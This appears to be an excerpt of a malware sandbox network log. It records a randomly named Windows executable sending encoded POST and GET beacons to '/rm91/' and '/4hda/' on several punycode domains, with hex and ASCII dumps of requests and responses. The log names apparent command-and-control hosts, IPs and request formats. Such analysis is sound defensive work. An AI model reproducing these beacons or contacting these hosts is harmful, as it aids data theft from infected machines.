                                  Data Raw: 61 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                  Data Ascii: a19f<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="c
                                  Jul 13, 2024 00:08:25.762561083 CEST224INData Raw: 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 72 6f 74 6f 3d 22 68 74 74 70 73 3a 22 7d 69 66 28 21
                                  Data Ascii: dn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT",
                                  Jul 13, 2024 00:08:25.762598991 CEST1236INData Raw: 22 52 4f 22 2c 22 42 47 22 2c 22 45 54 22 2c 22 45 4c 22 2c 22 47 41 22 2c 22 48 52 22 2c 22 4c 56 22 2c 22 4c 54 22 2c 22 4d 54 22 2c 22 4e 4c 22 2c 22 50 4c 22 2c 22 53 56 22 2c 22 53 4b 22 2c 22 53 4c 22 2c 22 43 53 22 2c 22 48 55 22 2c 22 52
                                  Data Ascii: "RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR","ZH","TR","UK","AR","BS"];if("cmp_customlanguages" in window){for(var a=0;a<window.cmp_customlanguages.length;a++){b.push(window.cmp_customlanguages[a].l
                                  Jul 13, 2024 00:08:25.762635946 CEST187INData Raw: 7d 69 66 28 22 75 73 65 72 4c 61 6e 67 75 61 67 65 22 20 69 6e 20 6e 61 76 69 67 61 74 6f 72 29 7b 63 2e 70 75 73 68 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 4c 61 6e 67 75 61 67 65 29 7d 76 61 72 20 68 3d 22 22 3b 66 6f 72 28 76 61 72 20 64
                                  Data Ascii: }if("userLanguage" in navigator){c.push(navigator.userLanguage)}var h="";for(var d=0;d<c.length;d++){var b=c[d].toUpperCase();if(g.indexOf(b)!=-1){h=b;break}if(b.indexOf("-")!=-1){b=b.sub
                                  Jul 13, 2024 00:08:25.762684107 CEST1236INData Raw: 73 74 72 28 30 2c 32 29 7d 69 66 28 67 2e 69 6e 64 65 78 4f 66 28 62 29 21 3d 2d 31 29 7b 68 3d 62 3b 62 72 65 61 6b 7d 7d 69 66 28 68 3d 3d 22 22 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 64 65 66 61 75 6c 74 6c 61 6e 67 29
                                  Data Ascii: str(0,2)}if(g.indexOf(b)!=-1){h=b;break}}if(h==""&&typeof(cmp_getlang.defaultlang)=="string"&&cmp_getlang.defaultlang!==""){return cmp_getlang.defaultlang}else{if(h==""){h="EN"}}h=h.toUpperCase();return h};(function(){var u=document;var v=u.ge
                                  Jul 13, 2024 00:08:25.762717962 CEST1236INData Raw: 6b 2b 22 2f 2f 22 2b 68 2e 63 6d 70 5f 68 6f 73 74 2b 22 2f 64 65 6c 69 76 65 72 79 2f 63 6d 70 2e 70 68 70 3f 22 2b 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 68 26 26 68 2e 63 6d 70 5f 69 64 3e 30 3f 22 69 64 3d 22 2b 68 2e 63 6d 70 5f 69 64 3a 22
                                  Data Ascii: k+"//"+h.cmp_host+"/delivery/cmp.php?"+("cmp_id" in h&&h.cmp_id>0?"id="+h.cmp_id:"")+("cmp_cdid" in h?"&cdid="+h.cmp_cdid:"")+"&h="+encodeURIComponent(g)+(c!=""?"&cmpdesign="+encodeURIComponent(c):"")+(f!=""?"&cmpregulationkey="+encodeURICompo
                                  Jul 13, 2024 00:08:25.762757063 CEST448INData Raw: 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b
                                  Data Ascii: &u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("scri
                                  Jul 13, 2024 00:08:25.762871981 CEST1236INData Raw: 73 70 6c 61 79 3a 6e 6f 6e 65 22 3b 69 66 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75 6c 74 72
                                  Data Ascii: splay:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none"
                                  Jul 13, 2024 00:08:25.762901068 CEST224INData Raw: 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73 65 7b 5f 5f
                                  Data Ascii: .push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",support
                                  Jul 13, 2024 00:08:25.763070107 CEST1236INData Raw: 65 64 41 50 49 73 3a 5b 22 74 63 66 63 61 22 2c 22 75 73 6e 61 74 22 2c 22 75 73 63 61 22 2c 22 75 73 76 61 22 2c 22 75 73 63 6f 22 2c 22 75 73 75 74 22 2c 22 75 73 63 74 22 5d 2c 63 6d 70 49 64 3a 33 31 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f
                                  Data Ascii: edAPIs:["tcfca","usnat","usca","usva","usco","usut","usct"],cmpId:31}};window.cmp_gppstub=function(){var a=arguments;__gpp.q=__gpp.q||[];if(!a.length){return __gpp.q}var g=a[0];var f=a.length>1?a[1]:null;var e=a.length>2?a[2]:null;if(g==="ping
                                  Jul 13, 2024 00:08:25.772265911 CEST1236INData Raw: 2e 63 6f 6d 6d 61 6e 64 2c 62 2e 70 61 72 61 6d 65 74 65 72 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 63 6d 70 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c
                                  Data Ascii: .command,b.parameter,function(h,g){var e={__cmpReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__uspapiCall" in c){var b=c.__uspapiCall;window.__uspapi(b.c


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.44974643.252.167.188804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:39.497873068 CEST791OUTPOST /rm91/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--fhq1c541j0zr.com
                                  Origin: http://www.xn--fhq1c541j0zr.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 200
                                  Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 42 45 45 45 38 4f 65 58 67 67 4b 66 79 41 63 45 31 64 46 65 67 71 6e 77 43 46 69 53 34 59 6c 4a 77 3d 3d
                                  Data Ascii: tDA=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPBEEE8OeXggKfyAcE1dFegqnwCFiS4YlJw==
                                  Jul 13, 2024 00:08:40.429691076 CEST367INHTTP/1.1 404 Not Found
                                  Date: Fri, 12 Jul 2024 22:14:44 GMT
                                  Server: Apache
                                  Content-Length: 203
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.44974743.252.167.188804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:42.029982090 CEST811OUTPOST /rm91/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--fhq1c541j0zr.com
                                  Origin: http://www.xn--fhq1c541j0zr.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 220
                                  Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 4f 55 74 46 4d 57 66 37 6c 73 53 78 49 78 41 69 4e 77 71 43 45 7a 38 35 2f 37 7a 71 57 34 66 70 77 3d
                                  Data Ascii: tDA=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgOUtFMWf7lsSxIxAiNwqCEz85/7zqW4fpw=
                                  Jul 13, 2024 00:08:42.918051958 CEST367INHTTP/1.1 404 Not Found
                                  Date: Fri, 12 Jul 2024 22:14:46 GMT
                                  Server: Apache
                                  Content-Length: 203
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.44974843.252.167.188804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:44.561718941 CEST10893OUTPOST /rm91/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--fhq1c541j0zr.com
                                  Origin: http://www.xn--fhq1c541j0zr.com
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 10300
                                  Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 30 57 66 78 51 41 41 6e 73 61 54 6d 65 51 32 6b 6f 4d 45 63 4a 38 62 43 38 2f 44 67 56 73 38 43 77 58 78 4c 69 46 32 61 36 37 62 74 66 66 39 34 41 56 65 53 50 64 45 43 76 35 70 6c 41 61 42 70 6a 49 2f 76 72 59 67 2f 49 35 4f 33 31 63 52 45 39 66 36 59 6b 35 62 4d 7a 51 72 2b 49 4a 37 58 54 4e 31 6d 4a 50 32 33 70 61 4e 65 70 68 2f 53 74 41 66 59 43 54 35 48 59 6d 32 35 59 6f 47 76 78 70 76 30 74 4e 64 74 51 43 72 43 55 39 62 61 31 55 6c 79 56 72 36 34 47 62 49 39 58 48 4c 69 7a 74 30 70 [TRUNCATED]
                                  Data Ascii: tDA=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIHoW3wu7AeBT9hRHxBbWZ+xupcf6/SGnGcpmji6kYj7kEMIa5HHvshQ5+/PTut4QK0qZ597/XbOi1cWRKFgWSADA+kDImsvlV6nBllPheO73yM6PmUTD4GY2WiBlbfKxdC0WfxQAAnsaTmeQ2koMEcJ8bC8/DgVs8CwXxLiF2a67btff94AVeSPdECv5plAaBpjI/vrYg/I5O31cRE9f6Yk5bMzQr+IJ7XTN1mJP23paNeph/StAfYCT5HYm25YoGvxpv0tNdtQCrCU9ba1UlyVr64GbI9XHLizt0pVuotL56dcfbRt22sqIkMd51A2wm8EW0SiiNi/QpdtY8XMVE1bwp7GBEL34NQvDeP+UeWn40D/J+yz9oKTMOHMojIE7gwrHQZC3z5phGWjMLqThzYqL4v4hWgBu6MjSrEJ93kGXnxZZ/8fLsyOzpylVY3PZIUFSaXUVMcV9EWisug167GRuBhd63iiG6kUHBGOf8/JSyacK9Whc1aNpDrXFakxg9DsUvjaG2s/DEfgYJLfZTPCoQd5ijEaof0171coCztoVSuQ1msEF+FnhNF7wDIN3+iGk+A3L+18f43ePXdQX+NdciT1g4CDSd14ipxbT1jV1Sm1QFpIXhz1QNtPUQkzRhQDEY2x6RwibrEMn2OQ+LkRrmGCLz5C+DuDpNaonW0MM8DSq1BwhJjeIfs6YbP+366NXxUcl85SJr0sEeKbSwvjzMO+QYy3o9Y4InICSg72javScEAe9yBUfT0HIT32wHcrM6TbOWuMYuib1J61Lxthy37BW2Wa0DJF4j/X1pEK/6Fy09gY7InTaFUn7AeXXXnrzWAt6HNOoYwjEBJ705hAXx1zxI0jQQaLhLFYmeTQQWj1Fc53eNhCnHqD7KGNNWPGNfeHFDCTvaUzaYzbiHbmiWxXImU1bkqsAKvsrHHQjUVqP41wEFaeyhVVotORkpSzlq1lf [TRUNCATED]
                                  Jul 13, 2024 00:08:45.422015905 CEST367INHTTP/1.1 404 Not Found
                                  Date: Fri, 12 Jul 2024 22:14:49 GMT
                                  Server: Apache
                                  Content-Length: 203
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.44974943.252.167.188804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:47.099536896 CEST517OUTGET /rm91/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Host: www.xn--fhq1c541j0zr.com
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Jul 13, 2024 00:08:47.967788935 CEST367INHTTP/1.1 404 Not Found
                                  Date: Fri, 12 Jul 2024 22:14:52 GMT
                                  Server: Apache
                                  Content-Length: 203
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.449750194.9.94.85804484C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 13, 2024 00:08:53.091829062 CEST791OUTPOST /4hda/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.xn--matfrmn-jxa4m.se
                                  Origin: http://www.xn--matfrmn-jxa4m.se
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Content-Length: 200
                                  Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                  Data Raw: 74 44 41 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 63 6e 30 59 73 41 46 43 66 32 35 4c 4b 39 55 74 59 5a 59 74 67 75 41 72 58 62 55 38 47 34 48 63 77 3d 3d
                                  Data Ascii: tDA=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2Xcn0YsAFCf25LK9UtYZYtguArXbU8G4Hcw==
                                  Jul 13, 2024 00:08:53.728615999 CEST1236INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 12 Jul 2024 22:08:53 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Powered-By: PHP/8.1.24
                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 